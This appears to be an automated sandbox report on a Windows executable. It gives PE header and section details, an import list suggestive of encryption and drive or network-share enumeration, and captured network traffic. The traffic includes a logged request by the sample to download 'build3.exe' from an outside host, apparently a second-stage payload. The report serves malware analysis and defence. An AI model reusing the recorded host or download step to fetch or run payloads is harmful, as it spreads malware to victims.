Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0c756c849bc7b459f78f7a5ce46cd4a7

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1085d0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12b000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12c000	0xa32c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xcc460	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x105ac8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xcc000	0x3f0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xca5bc	0xca600	9d3505098e4eee3dc361c6bef0b26b98	False	0.5030461029184682	data	6.570129941575212	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xcc000	0x3dba2	0x3dc00	f19ff983c6336630532093d9713707ce	False	0.3958003858805668	data	5.668482952815905	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x10a000	0x20358	0x6400	b9cff45acba0bf73d16290994acd3da3	False	0.4978125	data	4.939624310736174	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x12b000	0x1e0	0x200	9c3280f335e8e346ce925599d24fcc62	False	0.533203125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12c000	0xa32c	0xa400	24f3bb349067df95682b9a6026a53082	False	0.6199980945121951	data	6.612523450234696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

DLL	Import
RPCRT4.dll	RpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
MPR.dll	WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
WININET.dll	InternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
WINMM.dll	timeGetTime
SHLWAPI.dll	PathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
KERNEL32.dll	VirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
USER32.dll	PeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
ADVAPI32.dll	RegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
SHELL32.dll	SHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
ole32.dll	CoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
OLEAUT32.dll	SysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
IPHLPAPI.DLL	GetAdaptersInfo
WS2_32.dll	inet_ntoa, inet_addr, gethostbyname
DNSAPI.dll	DnsFree, DnsQuery_W
CRYPT32.dll	CryptStringToBinaryA
GDI32.dll	DeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2024 01:35:57.404159069 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.404258013 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:57.404366970 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.420011044 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.420042992 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:57.674853086 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:57.674935102 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.792140007 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.792196989 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:57.792592049 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:57.792783976 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.797086000 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:57.841903925 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:58.244445086 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:58.244519949 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:58.244662046 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:58.244662046 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:58.247033119 CET	49729	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:58.247071981 CET	443	49729	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:58.933039904 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:58.933135986 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:58.933275938 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:58.944819927 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:58.944871902 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.191400051 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.191752911 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.196257114 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.196309090 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.196634054 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.196734905 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.198818922 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.245949984 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.772794008 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.772850037 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.772870064 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.772908926 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.772914886 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.772933006 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:35:59.772949934 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.772978067 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.773957968 CET	49730	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:35:59.773978949 CET	443	49730	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:00.168560028 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.169039011 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.174576998 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.174623966 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:00.174679041 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.185698032 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.185715914 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:00.284696102 CET	80	49732	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.284907103 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.285048962 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.286668062 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.286739111 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.286905050 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.400397062 CET	80	49732	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.401484013 CET	80	49732	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.401551008 CET	80	49732	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.401662111 CET	80	49732	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.401667118 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.401825905 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.404849052 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.406033993 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.406092882 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.406115055 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.406128883 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:00.406146049 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.406164885 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:00.434072971 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:00.434149027 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.439203978 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.439222097 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:00.439590931 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:00.439657927 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.441596985 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:00.481942892 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:01.025734901 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:01.025796890 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:01.025816917 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:01.025830030 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:01.025881052 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:01.026787043 CET	49733	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:01.026801109 CET	443	49733	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:01.135044098 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:01.250653982 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:01.250778913 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:01.251174927 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:01.366630077 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:01.367522001 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:01.367585897 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:01.367625952 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:01.367747068 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:01.367747068 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:05.450329065 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:05.569555998 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:05.569621086 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:05.569658995 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:05.569801092 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:05.569801092 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:05.569801092 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:06.388365984 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:06.504700899 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:06.504729033 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:06.504745960 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:06.504894018 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:06.504894018 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:06.504894018 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:07.322226048 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.322309017 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:07.322395086 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.361514091 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.361562014 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:07.613557100 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:07.613663912 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.618307114 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.618335962 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:07.618688107 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:07.618755102 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.620767117 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:07.665901899 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:08.191857100 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:08.192018986 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:08.192048073 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:08.192114115 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:08.192714930 CET	49735	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:08.192753077 CET	443	49735	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:10.606481075 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:10.725145102 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:10.725246906 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:10.725286961 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:10.725281954 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:10.725359917 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:10.725359917 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:11.620079041 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:11.736500025 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:11.736566067 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:11.736607075 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:11.736651897 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:11.736651897 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:11.736651897 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:15.453862906 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.453901052 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:15.453963041 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.462065935 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.462084055 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:15.714107990 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:15.714189053 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.719170094 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.719178915 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:15.719417095 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:15.719883919 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.727262020 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:15.746963024 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:15.773935080 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:15.865904093 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:15.865948915 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:15.865986109 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:15.866023064 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:15.866090059 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:16.308037996 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:16.308095932 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:16.308106899 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:16.308257103 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:16.308325052 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:16.309153080 CET	49736	443	192.168.2.4	104.21.65.24
Jan 26, 2024 01:36:16.309166908 CET	443	49736	104.21.65.24	192.168.2.4
Jan 26, 2024 01:36:17.138983011 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:17.255230904 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:17.255290031 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:17.255307913 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:17.255330086 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:17.255343914 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:17.255374908 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:20.402007103 CET	80	49732	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:20.402093887 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:35.866493940 CET	80	49731	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:35.866640091 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:36:37.255822897 CET	80	49734	199.59.242.150	192.168.2.4
Jan 26, 2024 01:36:37.255888939 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:02.961420059 CET	49731	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:02.961441040 CET	49732	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:49.996665955 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:50.308145046 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:50.917515039 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:52.120737076 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:54.526993036 CET	49734	80	192.168.2.4	199.59.242.150
Jan 26, 2024 01:37:59.339410067 CET	49734	80	192.168.2.4	199.59.242.150

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2024 01:35:57.249713898 CET	60298	53	192.168.2.4	1.1.1.1
Jan 26, 2024 01:35:57.371047974 CET	53	60298	1.1.1.1	192.168.2.4
Jan 26, 2024 01:35:59.890434980 CET	64375	53	192.168.2.4	1.1.1.1
Jan 26, 2024 01:35:59.894603014 CET	64239	53	192.168.2.4	1.1.1.1
Jan 26, 2024 01:36:00.024852037 CET	53	64375	1.1.1.1	192.168.2.4
Jan 26, 2024 01:36:00.167258024 CET	53	64239	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Jan 26, 2024 01:36:00.285048962 CET	94	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
Jan 26, 2024 01:36:00.401484013 CET	1286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jan 2024 00:36:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=58750d2a-0222-8ca2-2f57-f0d9f084f2b1; expires=Fri, 26 Jan 2024 00:51:00 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 33 35 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 79 46 59 42 42 6c 4d 54 4b 2b 73 32 64 72 48 38 4d 2f 55 75 50 74 4f 77 67 43 30 51 35 49 2b 71 72 36 4f 30 39 31 6a 76 4e 52 4b 36 79 2b 47 61 42 36 5a 6a 49 71 68 52 71 7a 56 71 79 67 6c 6c 41 58 66 42 2f 6d 55 55 53 61 32 71 63 31 4a 2f 63 2f 47 6c 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 Data Ascii: 35b<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Jan 26, 2024 01:36:00.401551008 CET	401	IN	Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4e 54 67 33 4e 54 42 6b 4d 6d 45 74 4d 44 49 79 4d 69 30 34 59 32 45 79 4c 54 4a 6d 4e 54 63 74 5a 6a Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiNTg3NTBkMmEtMDIyMi04Y2EyLTJmNTctZjBkOWYwODRmMmIxIiwicGFnZV90aW1lIjoxNzA2MjI5MzYwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvZmlsZXNcLzFcL2J1aWxkMy5leGUiLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWV
Jan 26, 2024 01:36:00.401662111 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
